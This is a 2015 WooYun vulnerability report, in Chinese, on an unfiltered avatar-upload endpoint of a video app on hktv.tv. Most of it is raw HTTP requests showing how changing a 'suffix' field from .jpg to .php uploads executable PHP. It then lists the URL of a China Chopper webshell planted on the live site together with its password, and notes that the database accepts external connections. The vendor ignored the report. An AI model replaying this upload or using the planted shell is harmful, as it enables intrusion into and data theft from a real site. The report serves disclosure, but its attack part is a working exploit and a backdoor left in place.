当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115323

漏洞标题:云视某APP存在上传导致getshell#8

相关厂商:cdvcloud.com

漏洞作者:

提交时间:2015-05-21 14:33

修复时间:2015-05-26 14:34

公开时间:2015-05-26 14:34

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

*

详细说明:

光息谷 为云视旗下APP
漏洞存在头像上传地址
完全没有过滤
上传头像时抓包截取数据

POST /e/extend/new_client_api/headpic.php HTTP/1.1
Host: www.hktv.tv
Proxy-Connection: close
Accept-Encoding: gzip
Content-Type: multipart/form-data; charset=utf-8; boundary=0xKhTmLbOuNdArY-E9ABB41E-6513-421A-A221-9792DEE8FB13
Content-Length: 577
Connection: close
User-Agent: 光息谷 2.9 (iPhone; iPhone OS 8.3; zh_CN)
--0xKhTmLbOuNdArY-E9ABB41E-6513-421A-A221-9792DEE8FB13
Content-Disposition: form-data; name="userid"
549
--0xKhTmLbOuNdArY-E9ABB41E-6513-421A-A221-9792DEE8FB13
Content-Disposition: form-data; name="suffix"
.jpg
--0xKhTmLbOuNdArY-E9ABB41E-6513-421A-A221-9792DEE8FB13
Content-Disposition: form-data; name="agent"
iphone
--0xKhTmLbOuNdArY-E9ABB41E-6513-421A-A221-9792DEE8FB13
Content-Disposition: form-data; name="userpic"; filename="photo.jpg"
Content-Type: image/jpeg
内容
--0xKhTmLbOuNdArY-E9ABB41E-6513-421A-A221-9792DEE8FB13--


改包为:

POST /e/extend/new_client_api/headpic.php HTTP/1.1
Host: www.hktv.tv
Proxy-Connection: close
Accept-Encoding: gzip
Content-Type: multipart/form-data; charset=utf-8; boundary=0xKhTmLbOuNdArY-E9ABB41E-6513-421A-A221-9792DEE8FB13
Content-Length: 577
Connection: close
User-Agent: 光息谷 2.9 (iPhone; iPhone OS 8.3; zh_CN)
--0xKhTmLbOuNdArY-E9ABB41E-6513-421A-A221-9792DEE8FB13
Content-Disposition: form-data; name="userid"
549
--0xKhTmLbOuNdArY-E9ABB41E-6513-421A-A221-9792DEE8FB13
Content-Disposition: form-data; name="suffix"
.php
--0xKhTmLbOuNdArY-E9ABB41E-6513-421A-A221-9792DEE8FB13
Content-Disposition: form-data; name="agent"
iphone
--0xKhTmLbOuNdArY-E9ABB41E-6513-421A-A221-9792DEE8FB13
Content-Disposition: form-data; name="userpic"; filename="photo.jpg"
Content-Type: image/jpeg
test
--0xKhTmLbOuNdArY-E9ABB41E-6513-421A-A221-9792DEE8FB13--


测试上传:
http://www.hktv.tv//d//file//p//2015-05-21//6201283ecfe9f8cb1184c49c033a64de.php
成功写入
尝试getshell
传菜刀试试
http://www.hktv.tv//d//file//p//2015-05-21//e080d938fd44aa730adf80def114e0b0.php
密码ks

ks (2).png


主站和子站一览无余
通过配置信息可以看到数据库与站是分离的而且理论上是允许外联的.
点到为止到此结束.

漏洞证明:

*

修复方案:

*

版权声明:转载请注明来源 @乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-26 14:34

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论